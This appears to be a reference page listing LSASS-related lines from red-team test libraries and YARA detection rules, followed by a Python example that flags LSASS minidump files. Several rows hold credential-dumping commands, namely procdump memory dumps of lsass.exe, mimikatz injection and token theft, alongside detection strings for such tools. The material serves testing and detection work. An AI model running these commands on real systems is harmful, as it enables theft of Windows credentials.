atomic-red-team T1036.003.md del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1055.md - Atomic Test #2 - Remote Process Injection in LSASS via mimikatz MIT License. © 2018 Red Canary
atomic-red-team T1055.md ## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz MIT License. © 2018 Red Canary
atomic-red-team T1055.md Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). MIT License. © 2018 Red Canary
atomic-red-team T1134.002.md $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe") MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1547.002.md After a reboot, Notepad.exe will be executed as child process of lsass.exe. MIT License. © 2018 Red Canary
signature-base apt_eqgrp.yar $s1 = "LSASS.EXE" fullword wide CC BY-NC 4.0
signature-base apt_hafnium.yar $s1 = "lsass.exe C:\windows\temp\lsass" ascii wide fullword CC BY-NC 4.0
signature-base apt_irontiger_trendmicro.yar $str2 = "Fail To Search LSASS Data" nocase wide ascii CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s7 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s5 = "Error: Cannot open LSASS.EXE!." fullword ascii /* score: '12.00' */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s7 = "LSASS HANDLE: %x" fullword ascii /* score: '5.00' */ CC BY-NC 4.0
signature-base apt_passthehashtoolkit.yar $s6 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */ CC BY-NC 4.0
signature-base apt_rwmc_powershell_creddump.yar $s3 = "Copy-Item -Path "\\$computername\\c$\windows\temp\lsass.dmp" -Destination "$logDirectoryPath"" fullword ascii CC BY-NC 4.0
signature-base apt_skeletonkey.yar $target_process = "lsass.exe" wide CC BY-NC 4.0
signature-base apt_sphinx_moth.yar $s2 = "LSASS secure pipe" fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base generic_anomalies.yar description = "Detects uncommon file size of lsass.exe" CC BY-NC 4.0
signature-base generic_anomalies.yar and filename == "lsass.exe" CC BY-NC 4.0
signature-base generic_dumps.yar description = "Detects a LSASS memory dump file" CC BY-NC 4.0
signature-base generic_dumps.yar $s1 = "lsass.exe" ascii fullword CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar $lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 } CC BY-NC 4.0
signature-base gen_powershell_suite.yar $ = "Calling Advapi32::OpenProcessToken –> LSASS" ascii CC BY-NC 4.0
signature-base gen_powershell_toolkit.yar $x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii CC BY-NC 4.0
signature-base spy_equation_fiveeyes.yar $s1 = "lsasrv32.dll and lsass.exe" fullword wide CC BY-NC 4.0
signature-base spy_equation_fiveeyes.yar $s3 = "LSASS.EXE" fullword wide CC BY-NC 4.0
signature-base spy_regin_fiveeyes.yar $s0 = "\SYSTEMROOT\system32\lsass.exe" fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $d = "Cannot get PID of LSASS.EXE" CC BY-NC 4.0
signature-base thor-hacktools.yar $f = "Couldn't find LSASS pid" CC BY-NC 4.0
signature-base thor-hacktools.yar $s0 = "LSASS.EXE" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = "LSASS.EXE" fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = "Unable to open LSASS.EXE process" fullword ascii CC BY-NC 4.0
signature-base thor_inverse_matches.yar description = "Anomaly rule looking for certain strings in a system file (maybe false positive on certain systems) - file lsass.exe" CC BY-NC 4.0
signature-base thor_inverse_matches.yar filename == "lsass.exe" CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = "LSASS minidump file for mimikatz" CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar $lsass = "System32\lsass.exe" wide nocase CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar (uint32(0) == 0x504d444d) and $lsass and filesize > 50000KB and not filename matches /WER/ CC BY-NC 4.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml name: Leverage Procdump for lsass memory Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml description: Dump lsass for later use with mimikatz Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; Apache-2.0
stockpile 7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml name: "OS Credential Dumping: LSASS Memory" Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml name: Find LSASS Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml description: Get process info for LSASS Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml $valid = foreach($p in $ps) { if($p.ProcessName -eq "lsass") {$p} }; Apache-2.0
stockpile 0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml Process[] allProc = Process.GetProcessesByName("lsass"); Apache-2.0

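The generic_dumps.yar and yara_mixed_ext_vars.yar rows describe file-based detection of an LSASS dump: the minidump magic at offset 0 (uint32(0) == 0x504d444d, the bytes MDMP), the wide string System32\lsass.exe somewhere in the file (it appears in the module list of the dumped process), a size threshold of 50000KB and an exclusion for Windows Error Reporting paths. The Python below is an added example written for this page, not the YARA rule itself or code from signature-base: it reads the fixed 32-byte MINIDUMP_HEADER, applies the same checks, and builds a constructed minidump-shaped sample to run against. The header layout and the 0xA793 version constant are from the Windows SDK definition of MINIDUMP_HEADER; the sample bytes are constructed and much smaller than a real LSASS dump, so the threshold is a parameter.

```python
import re
import struct

MDMP_MAGIC = 0x504D444D                    # b"MDMP" read as a little-endian uint32
MINIDUMP_VERSION = 0xA793                  # low word of MINIDUMP_HEADER.Version
# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_FMT = "<IIIIIIQ"
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 32 bytes
MIN_LSASS_DUMP_SIZE = 50000 * 1024         # the rule's "filesize > 50000KB"


def wide_nocase(s: str):
    """Regex for s as UTF-16LE, case-insensitive on ASCII letters (YARA 'wide nocase')."""
    parts = []
    for ch in s:
        if ch.isalpha():
            parts.append(b"[" + ch.lower().encode() + ch.upper().encode() + b"]\x00")
        else:
            parts.append(re.escape(ch.encode()) + b"\x00")
    return re.compile(b"".join(parts))


LSASS_MODULE = wide_nocase("System32\\lsass.exe")


def parse_minidump_header(data: bytes):
    """Return the fixed header fields as a dict, or None if data is not a minidump."""
    if len(data) < HEADER_SIZE:
        return None
    sig, version, nstreams, dir_rva, checksum, timestamp, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_MAGIC:
        return None
    return {
        "version": version & 0xFFFF,   # high word is implementation-specific
        "streams": nstreams,
        "directory_rva": dir_rva,
        "timestamp": timestamp,
        "flags": flags,
    }


def triage_dump(data: bytes, filename: str, min_size: int = MIN_LSASS_DUMP_SIZE) -> dict:
    """Apply the rule's conditions to one file and return each partial result plus the verdict."""
    header = parse_minidump_header(data)
    result = {
        "minidump": header is not None,
        "lsass_module": LSASS_MODULE.search(data) is not None,
        "wer": "WER" in filename,          # the rule's "not filename matches /WER/"
        "large": len(data) > min_size,
        "header": header,
    }
    result["verdict"] = (result["minidump"] and result["lsass_module"]
                         and result["large"] and not result["wer"])
    return result


def build_sample(module_path: str, size: int = 4096) -> bytes:
    """Constructed minidump-shaped bytes: a valid header, then one UTF-16LE module path."""
    header = struct.pack(HEADER_FMT, MDMP_MAGIC, MINIDUMP_VERSION, 0, HEADER_SIZE, 0, 0, 0)
    body = bytearray(size - HEADER_SIZE)
    path = module_path.encode("utf-16-le")
    body[256:256 + len(path)] = path
    return header + bytes(body)


if __name__ == "__main__":
    sample = build_sample(r"C:\Windows\System32\lsass.exe")
    print(triage_dump(sample, "lsass.dmp", min_size=1024))
```

Keep the T1003.001 row that XORs the dump on disk in mind when relying on this: a dump that has been transformed before it is written no longer starts with MDMP and no longer contains the module path, so file signatures of this kind belong next to process-level detection (handle opens on lsass.exe from non-system accounts, as in the sigma rows earlier on the page), not in place of it.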
MIT License. Copyright (c) 2020-2021 Strontic.